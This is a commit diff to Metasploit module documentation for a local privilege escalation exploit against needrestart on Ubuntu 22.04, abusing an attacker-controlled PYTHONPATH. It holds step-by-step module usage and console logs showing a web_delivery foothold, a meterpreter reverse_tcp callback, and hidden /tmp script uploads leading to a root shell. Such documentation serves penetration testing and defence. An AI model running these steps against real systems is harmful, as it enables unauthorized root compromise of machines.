offload files to data
This commit is contained in:
h00die
@@ -1,33 +1,30 @@
|
||||
The following is the recommended format for module documentation. But feel free to add more content/sections to this.
|
||||
One of the general ideas behind these documents is to help someone troubleshoot the module if it were to stop
|
||||
functioning in 5+ years, so giving links or specific examples can be VERY helpful.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
|
||||
files, as well as instructions on installing/configuring the environment if it is different than a
|
||||
standard install. Much of this will come from the PR, and can be copy/pasted.
|
||||
Local attackers can execute arbitrary code as root by
|
||||
tricking needrestart into running the Python interpreter with an
|
||||
attacker-controlled PYTHONPATH environment variable.
|
||||
|
||||
Verified against Ubuntu 22.04 with needrestart 3.5-5ubuntu2.1
|
||||
|
||||
## Verification Steps
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Install the application
|
||||
1. Start msfconsole
|
||||
1. Do: `use [module path]`
|
||||
1. Do: `run`
|
||||
1. You should get a shell.
|
||||
2. Start msfconsole
|
||||
3. Get an initial shell
|
||||
4. Do: `use exploit/linux/local/ubuntu_needrestart_lpe`
|
||||
5. Do: `set lhost <ip>`
|
||||
6. Do: `set lport <port>`
|
||||
7. Do: `set session <session>`
|
||||
8. Do: `run`
|
||||
9. You should get a root shell.
|
||||
|
||||
## Options
|
||||
List each option and how to use it.
|
||||
|
||||
### Option Name
|
||||
|
||||
Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
|
||||
|
||||
## Scenarios
|
||||
Specific demo of using the module that might be useful in a real world scenario.
|
||||
|
||||
### Version and OS
|
||||
### Ubuntu 22.04 with needrestart 3.5-5ubuntu2.1
|
||||
|
||||
Gain initial shell
|
||||
|
||||
```
|
||||
msf6 > use exploit/multi/script/web_delivery
|
||||
@@ -63,9 +60,12 @@ meterpreter > getuid
|
||||
Server username: h00die
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
```
|
||||
|
||||
Priv Esc
|
||||
|
||||
```
|
||||
msf6 exploit(multi/script/web_delivery) > use exploit/linux/local/ubuntu_needrestart_lpe
|
||||
verbose true
|
||||
run
|
||||
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/local/ubuntu_needrestart_lpe) > set payload linux/x64/meterpreter/reverse_tcp
|
||||
payload => linux/x64/meterpreter/reverse_tcp
|
||||
@@ -89,6 +89,11 @@ msf6 exploit(linux/local/ubuntu_needrestart_lpe) > run
|
||||
[*] Uploading py_script: /tmp/.FzzlJ
|
||||
[*] Uploading build and run script: /tmp/.h0IkpDa
|
||||
[*] Launching exploit, and waiting for needrestart to run...
|
||||
```
|
||||
|
||||
On the remote Ubuntu box run `sudo needrestart`
|
||||
|
||||
```
|
||||
[*] Transmitting intermediate stager...(126 bytes)
|
||||
[*] Sending stage (3045380 bytes) to 2.2.2.2
|
||||
[*] chown: changing ownership of '/tmp/.1K8Hy2tOtq': Operation not permitted
|
||||
|
||||
Reference in New Issue
Block a user